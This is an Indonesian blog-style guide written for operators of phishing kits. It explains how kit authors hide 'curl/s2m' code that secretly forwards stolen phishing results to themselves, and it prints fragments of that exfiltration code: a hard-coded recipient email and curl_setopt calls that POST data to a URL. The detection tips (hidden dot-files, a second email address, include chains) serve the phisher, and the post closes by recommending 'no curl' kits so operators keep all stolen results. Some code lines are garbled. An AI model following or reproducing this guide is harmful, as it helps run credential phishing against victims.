Curl adalah program php untuk mengirimkan data dari sebuah server ke server lain yang sudah ditentukan melalui email. Program ini akan otomatis aktif ketika salah satu server menerima data.
Kamu bisa menemukan contoh program curl di sebuah script phising yang sudah dimodifikasi oleh authornya.
Pemain phising juga menyebut istilah curl dengan s2m.
Script yang memasang curl akan membagikan hasil atau results ke dua penerima.
Penerima pertama adalah seseorang yang menggunakan script. Dan penerimaan kedua adalah pencipta script itu sendiri.
Jadi secara tidak langsung, pencipta script juga ingin mendapatkan result dari script ciptanya.
Curl memiliki dua pemrograman untuk mengkonfigurasi masing-masing server.
Ini adalah contoh baris kode curl untuk server penerima.
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$emailku = 'recehbos26@gmail.com';
$headers = "From: testsite@gmail.com aypteam;
Dan ini adalah contoh curl yang ada di server pengguna script.
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, $url);
curl_setopt($ch2, CURLOPT_PgOST, 1); curl_setopt($ch2, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch2, CURLOPT_COOKIEJAR, getcwd()."/.push.txt");
Contoh di atas bukanlah kode lengkap dari curl. Itu hanya potong kode yang saya ambil dari sebuah script yang memuatnya.
Nah, jika kamu menemukan baris kode yang mirip dengan contoh, jangan gunakan script tersebut.
Untuk mendeteksi curl, kamu harus mengekstrak file script terlebih dahulu. Gunakan aplikasi zarchiver atau aplikasi bawaan hp untuk mengekstraknya.
Selanjutnya, aktifkan fitur tampilkan file tersembunyi (show hidden file) di file manager. Hal ini perlu lakukan karena biasanya file curl disembunyikan oleh pembuat script.
Buka semua file satu persatu, dan cek apakah memuat ciri-ciri berikut.
Sebuah script yang memiliki fitur send mail terdapat file yang isinya adalah baris kode untuk mengirim pesan ke alamat email yang tercantum. Biasanya, file tersebut bernama email.php.
Jika kamu menemukan script seperti ini tetapi ada dua alamat email yang tercantum, script tersebut memuat curl.
Alamat email tidak selalu tercantum dua atau sejajar di dalam satu file. Sering kali, alamat email yang satunya dilampirkan di dalam file lain.
Penggunaan tanda baca titik di awal kata dalam penanaman file adalah untuk menyembunyikan file tersebut.
Contohnya .init.php, .set.php, .mailer.php, dll.
File dengan nama depan titik biasanya memuat curl. Author script sengaja menggunakan nama tersebut agar file tidak terdeteksi oleh pengguna script.
Program curl biasanya ditandai dengan baris kode curl_setopt. Baris ini bisa kamu temui lebih dari satu apabila script memuat curl.
Bagaimana kalau saya tidak menemukan ciri-ciri tersebut di script?
Belum sepenuhnya bebas curl. Pasalnya, pembuat script juga pintar dengan mengubah kode curl menjadi kode biasa yang sering dipakai di script, seperti kode js, css, dan program php biasa.
Jika kode sudah disamarkan, gunakan trik berikut untuk mendeteksinya.
Cari file yang memuat kode include untuk mendeteksi curl.
Kode include pada pemrograman php berfungsi untuk memanggil kode dari file lain.
Contoh:
Pada file A.php terdapat kode include B.php. Artinya kode yang ada di file B.php akan dimuat di file A.php.
Nah, file B.php ini biasanya yang berisi kode curl.
Hati-hati ya! Dengan file yang terdapat kode include di dalamnya.
Curl tidak berbahaya, tetapi menguntungkan penyusun script, terutama pada script phising. Dia akan menerima results tanpa melakukan usaha apapun.
Sebenarnya, ini adalah trik curang atau nakal yang dilakukan oleh author script untuk mencuri hasil phising dari pemakai script.
Nah, bagi kamu yang tidak mau berbagi hasil results, sebaiknya gunakan script no curl/s2m.